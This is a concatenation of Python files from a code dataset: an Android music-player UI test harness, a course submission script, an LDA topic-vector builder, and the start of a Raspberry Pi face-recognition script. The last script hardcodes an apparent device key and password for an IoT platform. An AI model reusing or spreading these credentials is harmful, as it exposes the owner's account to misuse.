'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n buttons.append(find_by_id.children[4])\n elif i == 3:\n buttons.append(find_by_id.children[5].children[1])\n elif page == 'online_singer_songs':\n #'online_singer_songs':['home','toggle','play_all','download_single',],\n # #30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n child = len(find_by_id.children[0].children[1].children)\n if child < 6:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n rnd = random.randint(0,1)\n if rnd == 0:\n directs = 'top'\n else:\n directs = 'bottom'\n self.dragPage(directs)\n page = self.page_dict['online_more_singers_random']\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_singer_songs']\n self.getViewPoint(phone,page)\n else:\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n buttons.append(find_by_id.children[0].children[1].children[4])\n elif i == 3:\n buttons.append(find_by_id.children[0].children[1].children[5].children[1])\n elif page == 'online_singer_albums':\n #'online_singer_albums':['home','toggle','album',],\n # \t\t#32 children[1].children[1].children[0] first\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n child = len(find_by_id.children[1].children[1].children)\n if child >6 :\n child = 6\n rnd = random.randint(0,child-1)\n buttons.append(find_by_id.children[1].children[1].children[rnd])\n elif page == 'online_more_albums_random':\n #'online_more_albums_random':['random_albums'],\n rnd = random.randint(0,8)\n buttons.append(find_by_id.children[rnd])\n elif page == 'online_more_singers_random':\n #'online_more_singers_random':['random_singers'],\n rnd = random.randint(0,8)\n buttons.append(find_by_id.children[rnd])\n elif 'menu' in page:\n #fl.children, len(fl.children)\n child = len(find_by_id.children)\n buttons.append(child)\n tmp = find_by_id.children[child-1]\n menu_height = tmp.height\n buttons.append(menu_height)\n if 'menu' in page:\n menu_count = buttons[0]\n menu_height = buttons[1]\n print('%s_count--%d'%(page,menu_count))\n for i in xrange(menu_count):\n x = d_width/2\n num = i*menu_height + (menu_height/2)\n y = d_height - num\n key = buttons_names[menu_count-i-1]\n print('menu(%s,%s)##############%d'%(key,page,i))\n self.button_pos[phone][page][key] = {'x':x,'y':y}\n else:\n long =len(buttons)\n for i in xrange(long):\n point = viewer.getAbsoluteCenterOfView(buttons[i])\n x = point.x\n y = point.y\n key = buttons_names[i]\n print('%s,%s##############%d'%(key,page,i))\n self.button_pos[phone][page][key] = {'x':x,'y':y}\n print('##############Finishi getViewPoint: %s##############'% page)\n else:\n return False\n time.sleep(2)\n\n def getButtons(self):\n \"\"\"\n logic to get button pos\n \"\"\"\n print('##############getButtons##############')\n #init to start\n self.getPhoneType()\n d_width,d_height = self.getDeviceWH()\n self.unLock()\n phone = self.phone\n page_list = self.page_list\n self.killPlayer()\n #home page\n self.lauchPlayer()\n page = page_list[0]\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n #home page menu\n page = page_list[1]\n self.getViewPoint(phone,page)\n self.killPlayer()\n #nowplaying page\n x = d_width/2\n y = d_height/3\n self.lauchPlayer()\n self.touchDevice(x,y)\n for i in xrange(2):\n self.dragPage('left')\n self.dragPage('right')\n self.touchDevice(x,y)\n page = page_list[2]\n self.getViewPoint(phone,page)\n #nowplaying page menu\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = page_list[3]\n self.getViewPoint(phone,page)\n self.killPlayer()\n #song list page | singers list page | album list page | folder list page | song play list page | online song list page\n page = page_list[0]\n button_list = self.button_list\n for i in xrange(6):\n #'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n print('i##############%d'% i)\n button = button_list[phone][page][i+1]\n self.lauchPlayer()\n self.touchButton(phone,page,button)\n i_page = page_list[i*2+4]\n print('w_page##############%s'% i_page)\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+5]\n print('j_page##############%s'% j_page)\n self.getViewPoint(phone,j_page)\n self.killPlayer()\n for i in xrange(6):\n page = page_list[0]\n if i < 5:\n button = button_list[phone][page][i+2]\n else:\n button = button_list[phone][page][i+1]\n self.lauchPlayer()\n self.touchButton(phone,page,button)\n if i < 4:\n page = page_list[i*2+6]\n if i ==3 :\n #'playlist_detail':'id/list',#0 rnd\n rnd = 5#mostplayed\n button = button_list[phone][page][rnd]\n else:\n button = button_list[phone][page][len(button_list[phone][page])-1]\n #'singer_detail':'id/list',# 0 rnd\n #'album_detail':'id/list',#0 rnd\n #'folder_detail':'id/list',#0 rnd\n self.touchButton(phone,page,button)\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n #'singer_detail_menu':'id/expanded_menu',\n #'album_detail_menu':'id/expanded_menu',\n #'folder_detail_menu':'id/expanded_menu',\n #'playlist_detail_menu':'id/expanded_menu',\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n elif i == 4:\n #'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n #'billboard_menu':'id/expanded_menu',\n self.dragPage('right')\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n else:\n #'fm':'id/view_pager',#children[2].children[1].children[rnd]\n #'fm_menu':'id/expanded_menu',\n self.dragPage('right')\n self.dragPage('right')\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n self.killPlayer()\n for i in xrange(2):\n self.lauchPlayer()\n page = self.page_dict['musichome']\n button = self.button_list[phone][page][6]\n self.touchButton(phone,page,button)\n page = self.page_dict['online']\n button = self.button_list[phone][page][i*2+3]\n self.touchButton(phone,page,button)\n time.sleep(10)\n if i == 0:\n page = self.page_dict['online_more_albums_random']\n else:\n page = self.page_dict['online_more_singers_random']\n self.getViewPoint(phone,page)\n self.killPlayer()\n for i in xrange(3):\n self.lauchPlayer()\n page = self.page_dict['musichome']\n button = self.button_list[phone][page][6]\n self.touchButton(phone,page,button)\n if i == 0:\n page = self.page_dict['online']\n button = self.button_list[phone][page][3]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_albums_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n page = self.page_dict['online_album_detail']\n self.getViewPoint(phone,page)\n page = self.page_dict['online_album_detail_menu']\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n self.getViewPoint(phone,page)\n elif i == 1:\n page = self.page_dict['online']\n button = self.button_list[phone][page][5]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n page = self.page_dict['online_singer_songs']\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['online_singer_songs_menu']\n self.getViewPoint(phone,page)\n elif i == 2:\n page = self.page_dict['online']\n button = self.button_list[phone][page][5]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n self.dragPage('right')\n page = self.page_dict['online_singer_albums']\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['online_singer_albums_menu']\n self.getViewPoint(phone,page)\n self.killPlayer()\n self.pressKey(self.Key_Code['KEYCODE_HOME'])\n self.lockPhone()\n\n def pageTest(self,p_type=''):\n \"\"\"\n pageTest\n \"\"\"\n print('##############pageTest:%s##############'%p_type)\n self.lauchPlayer()\n phone = self.phone\n button_list = self.button_list\n d_width,d_height= self.getDeviceWH()\n if p_type == 'nowplaying':#2\n ###nowplaying page\n page = self.page_dict['musichome']\n button = button_list[phone][page][0]#musichome--main_play_button\n self.touchButton(phone,page,button)\n self.touchDevice(d_width/2,d_height/3)\n self.touchDevice(d_width/2,d_height/3)\n self.dragPage(direct='left')#nowplaying--list page\n self.dragPage(direct='right')#nowplaying--album page\n self.dragPage(direct='right')#nowplaying--lyric page\n self.dragPage(direct='left')#nowplaying--album page\n page = self.page_dict['nowplaying']\n button = button_list[phone][page][1]#nowplaying--equalizer\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][2]#nowplaying--prev\n self.touchButton(phone,page,button)\n button = button_list[phone][page][3]#nowplaying--pause\n for i in xrange(2):\n self.touchButton(phone,page,button)\n button = button_list[phone][page][4]#nowplaying--next\n self.touchButton(phone,page,button)\n button = button_list[phone][page][5]#nowplaying--repeat\n for i in xrange(2):\n self.touchButton(phone,page,button)\n button = button_list[phone][page][6]#nowplaying--toggle(favorite)\n for i in xrange(1):\n self.touchButton(phone,page,button)\n for i in xrange(6):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['nowplaying_menu']\n button = button_list[phone][page][i]#nowplaying_menu--delete--addto--modify--sendto--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['nowplaying']\n button = button_list[phone][page][0]#nowplaying--home\n self.touchButton(phone,page,button)\n elif p_type == 'songs':#4\n ###songs page\n page = self.page_dict['musichome']\n button = button_list[phone][page][1]#musichome--songs\n self.touchButton(phone,page,button)\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][3]#songs--randomsong\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][1]#songs--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-4'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['songs_menu']\n button = button_list[phone][page][i]#songs_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['songs']\n button = button_list[phone][page][0]#songs--home\n self.touchButton(phone,page,button)\n elif p_type == 'singers':#6\n ###singers page\n page = self.page_dict['musichome']\n button = button_list[phone][page][2]#musichome--singers\n self.touchButton(phone,page,button)\n page = self.page_dict['singers']\n button = button_list[phone][page][2]#singers--randomsinger\n self.touchButton(phone,page,button)\n page = self.page_dict['singer_detail']\n button = button_list[phone][page][0]#singer_detail--all_songs\n self.touchButton(phone,page,button)\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['singers']\n button = button_list[phone][page][1]\n self.touchButton(phone,page,button)#singers--toggle\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['singers']\n button = button_list[phone][page][2]#singers--randomsinger\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['singers_menu']\n button = button_list[phone][page][i]#singers_menu--photo--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['singers']\n button = button_list[phone][page][0]#singers--home\n self.touchButton(phone,page,button)\n elif p_type == 'albums':#8\n ###albums page\n page = self.page_dict['musichome']\n button = button_list[phone][page][3]#musichome--albums\n self.touchButton(phone,page,button)\n page = self.page_dict['albums']\n button = button_list[phone][page][2]#albums--randomalbum\n self.touchButton(phone,page,button)\n page = self.page_dict['album_detail']\n button = button_list[phone][page][0]#album_detail--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['albums']\n button = button_list[phone][page][1]#albums--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['albums']\n button = button_list[phone][page][2]#albums--randomalbum\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['albums_menu']\n button = button_list[phone][page][i]#albums_menu--cover--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['albums']\n button = button_list[phone][page][0]#albums--home\n self.touchButton(phone,page,button)\n elif p_type == 'folders':#10\n ###folders page\n page = self.page_dict['musichome']\n button = button_list[phone][page][4]#musichome--folders\n self.touchButton(phone,page,button)\n page = self.page_dict['folders']\n button = button_list[phone][page][2]#folders--randomfolder\n self.touchButton(phone,page,button)\n page = self.page_dict['folder_detail']\n button = button_list[phone][page][0]#folder_detail--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['folders']\n button = button_list[phone][page][1]#folders--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['folders']\n button = button_list[phone][page][2]#folders--randomfolder\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['folders_menu']\n button = button_list[phone][page][i]#folders_menu--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['folders']\n button = button_list[phone][page][0]#folders--home\n self.touchButton(phone,page,button)\n elif p_type == 'playlists':#12\n ###play lists page\n page = self.page_dict['musichome']\n button = button_list[phone][page][5]#musichome--playlists\n self.touchButton(phone,page,button)\n page = self.page_dict['playlists']\n button = button_list[phone][page][2]#playlists--favorite list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][3]#playlists--recentlyplayed list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][4]#playlists--recentlyadded list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][5]#playlists--mostplayed list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][1]#playlists--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][6]#playlists--newlist\n self.touchButton(phone,page,button)\n self.touchConfirmCancel('confirm')\n time.sleep(2)\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n self.touchConfirmCancel('confirm')\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlists_menu']\n button = button_list[phone][page][i]#playlists_menu--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][0]#playlists--home\n self.touchButton(phone,page,button)\n elif p_type == 'online':#14\n ###online music page\n page = self.page_dict['musichome']\n button = button_list[phone][page][6]#musichome--online\n self.touchButton(phone,page,button)\n page = self.page_dict['online']\n button = button_list[phone][page][2]#online_album_detail--input\n self.touchButton(phone,page,button)\n self.inputText()\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_ENTER'])\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('right')\n rnd = random.randint(0,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n page = self.page_dict['billboard']\n button = button_list[phone][page][0]#billboard--random_billboard\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('right')\n rnd = random.randint(0,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n page = self.page_dict['fm']\n button = button_list[phone][page][0]#fm--random_fm\n self.touchButton(phone,page,button)\n time.sleep(10)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('left')\n self.dragPage('left')\n page = self.page_dict['online']\n button = button_list[phone][page][6]#online_album_detail--hot_artists\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][4]#online--new_albums\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][5]#online_album_detail--more_artists\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = button_list[phone][page][0]#online_more_singers_random--random_singers\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['online']\n button = button_list[phone][page][3]#online_album_detail--more_albums\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_albums_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = button_list[phone][page][0]#online_more_albums_random--random_albums\n self.touchButton(phone,page,button)\n page = self.page_dict['online_album_detail']\n button = button_list[phone][page][2]#online_album_detail--play_all\n self.touchButton(phone,page,button)\n self.dragPage('right')\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][3]#online_album_detail--download_single\n self.touchButton(phone,page,button)\n print('Begin to download and wait 20 sec')\n time.sleep(20)\n print('End downloading')\n button = button_list[phone][page][2]#online_album_detail--play_all\n self.longPress(phone,page,button)\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n button = self.edit_mode_button[phone]['bottom-4']['2']#delete\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n self.touchConfirmCancel('confirm')\n self.killPlayer()\n\nif __name__=='__main__':\n ms = PlayerTest()\n begin_time = time.time()\n for device_id in ms.device_list:\n if device_id != '':\n ms.connectToDevice(device_id)\n device = ms.device\n if not device:\n print('Fail to connect to device %s'% device_id)\n elif device == 'error: device not found':\n print('Fail to connect to device %s'% device_id)\n else:\n ms.deviceID = device_id\n ms.getPhoneType()\n hms = time.strftime('%H:%M:%S')\n print('##############Begin to get view points @ time:%s##############'% hms)\n #ms.getButtons()\n hms = time.strftime('%H:%M:%S')\n print('##############End get view points @ time:%s##############'% hms)\n #print(ms.button_pos[ms.phone])\n ms.unLock()\n ms.killPlayer()\n test_order_index = []\n test_order_page = []\n test_page_count = 24\n pages = [2,4,8,10,12,14,]\n for i in xrange(test_page_count):\n long = len(pages)\n rnd = random.randint(0,long-1)\n page = pages[rnd]\n page_name = ms.page_list[page]\n test_order_index.append(rnd)\n test_order_page.append(page_name)\n for i in xrange(test_page_count):\n print(test_order_page)\n print('#######pageTest#######%d'%i)\n rnd = test_order_index[i]\n page = pages[rnd]\n page_name = ms.page_list[page]\n ms.pageTest(page_name)\n ms.getLog()\n ms.lockPhone()\n print(ms.button_pos)\n end_time = time.time()\n time_cost_float = end_time - begin_time\n time_cost_int = int(time_cost_float)\n second = time_cost_int%60\n minute = (time_cost_int/60)%60\n hour = (time_cost_int/60/60)\n block = ':'\n time_cost = str(hour) + block + str(minute) + block + str(second)\n print('##############Cost time %s to get view points##############'% time_cost)","sub_path":"HM2_MusicPlayerSanityTest.py","file_name":"HM2_MusicPlayerSanityTest.py","file_ext":"py","file_size_in_byte":81410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"443441251","text":"import argparse\n\nfrom nelson.gtomscs import submit\n\nLATE_POLICY = \"\"\"Late Assignments Policy:\n \\\"I have read the late assignments policy for CS6476. I understand that only my last\n commit before the deadline will be accepted.\\\"\n\"\"\"\n\nHONOR_PLEDGE = \"Honor Pledge:\\n\\n \\\"I have neither given nor received aid on this assignment.\\\"\\n\"\n\n\ndef require_pledges():\n print(LATE_POLICY)\n ans = raw_input(\"Please type 'yes' to agree and continue>\")\n if ans != \"yes\":\n raise RuntimeError(\"Late Assignments Policy policy not accepted.\")\n\n print\n print(HONOR_PLEDGE)\n ans = raw_input(\"Please type 'yes' to agree and continue>\")\n if ans != \"yes\":\n raise RuntimeError(\"Honor pledge not accepted\")\n print\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Submits code to the Udacity site.')\n parser.add_argument('part', choices=['ps01', 'ps01_report'])\n args = parser.parse_args()\n\n quiz = args.part\n course = \"cs6476\"\n\n if quiz == \"ps01\":\n filenames = [\"ps1.py\"]\n else:\n filenames = ['ps1_report.pdf', 'experiment.py', 'image1_.png', 'image1.png']\n\n require_pledges()\n\n submit(course, quiz, filenames)\n\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/ps01/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"437659838","text":"\"\"\"\nSTEP-2\nread the list of username, topic\nreturn a dict username: topic vector\n\n\"\"\"\nimport argparse\nimport pickle\nimport pandas as pd\nimport logging\n\n# Input arguments\nPROGRAM_DESCRIPTION = \"Read the topic asignment file from jLDADMM algorithm and creates the topic vectors\"\nparser = argparse.ArgumentParser(description=PROGRAM_DESCRIPTION)\nparser.add_argument('filename', type=str, help='user_topic_pickle')\nparser.add_argument('topicdict', type=str, help='user_topic_pickle')\nparser.add_argument('logfile', type=str, help='user_topic_pickle')\nargs = vars(parser.parse_args())\n\n\ndef main():\n print(\"some\")\n\n user_topic_list = args['filename']\n topic_result = args['topicdict']\n log_file = args['logfile']\n topic_count = 20\n\n list_user = pickle.load(open(user_topic_list, 'rb'))\n\n # create log file\n # log_file = user_topic_list.rpartition('/')[0] + \"log.log\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\n logging.debug(\"make topic vector for {0} \".format(user_topic_list))\n # print(list_user)\n df = pd.DataFrame(list_user)\n #print(df[:5])\n grouped_df = df.groupby(['userid'])\n\n dict = {}\n count = 0\n for key, item in grouped_df:\n count += 1\n #print (\"key: \" + key)\n gf = item.groupby('topic').size()\n topics = [str(x) for x in range(0, topic_count)]\n #print(topics)\n # topics = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10','11', '12',\n # '13', '14', '15', '16', '17', '18','19']\n topic_Dict = gf.to_dict()\n topic_vec = []\n total = 0\n for one_topic in topics:\n if one_topic in topic_Dict:\n topic_vec.append(topic_Dict[one_topic])\n total += topic_Dict[one_topic]\n else:\n topic_vec.append(0)\n #print(topic_vec)\n discarded_count = 0\n if total == 0:\n discarded_count += 1\n #print(\"user: \", key , \" discarded\")\n continue;\n if count % 1000 == 0:\n logging.info(\"users donr : {} \".format(count))\n finallist = [float(x)/float(total) for x in topic_vec]\n\n # change list to dict\n list_dict = {}\n for idx, val in enumerate(finallist):\n if val > 0:\n list_dict[idx] = val\n\n dict[key] = list_dict\n #logging.debug(\"discarded {}\".format(discarded_count))\n pickle.dump( dict, open(topic_result, 'w'))\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"jDMM/make_topic_vector.py","file_name":"make_topic_vector.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"15453195","text":"import numpy as np\nimport cv2\nimport time\nimport wolk\nimport face_recognition\nimport os\nfrom collections import deque\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nfrom text_reader import XFRReader\n\ndef sendToPlatform(list):\n if len(list) == 0:\n WD.add_sensor_reading(\"FR\", \"I dont see anyone!\")\n WD.publish()\n else:\n people = \"\"\n for person in list:\n people = people + person.rstrip() + \" \"\n WD.add_sensor_reading(\"FR\", people)\n WD.publish()\n\nprint(\"have opencl - \", cv2.ocl.haveOpenCL())\nif cv2.ocl.haveOpenCL():\n cv2.ocl.setUseOpenCL(True)\n print(\"use opencl - \", cv2.ocl.useOpenCL())\n\nsend_platform = True # if internet connection is down, you should turn it off\n # but doesnt really affect performance\n\nxfrreader = XFRReader()\nimages, names = xfrreader.readFiles()\n\n# gets all encodings\nencodings = list()\nfor image in images:\n loaded = face_recognition.load_image_file(image)\n encoding = face_recognition.face_encodings(loaded)[0]\n encodings.append(encoding)\n\nprint(\"running in \", 320, \"x\", 240)\nprint(\"fps \", 24)\n\ntime.sleep(1) \n\ncamera = PiCamera()\ncamera.resolution = (320, 240)\ncamera.framerate = 24 \nrawCapture = PiRGBArray(camera, size=camera.resolution)\n\nlastsent = deque()\nnow = deque()\n\nif send_platform:\n device = wolk.Device(\n key = \"5ot5t1hg5m2l7pnw\",\n password = \"94ba8dd1-8b18-420a-9e37-8eae2861cdf4\"\n )\n WD = wolk.WolkConnect(device)\n WD.connect()\n sendToPlatform(now)\n\ni = 0\n\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\"):\n if i < 2:\n img = frame.array\n 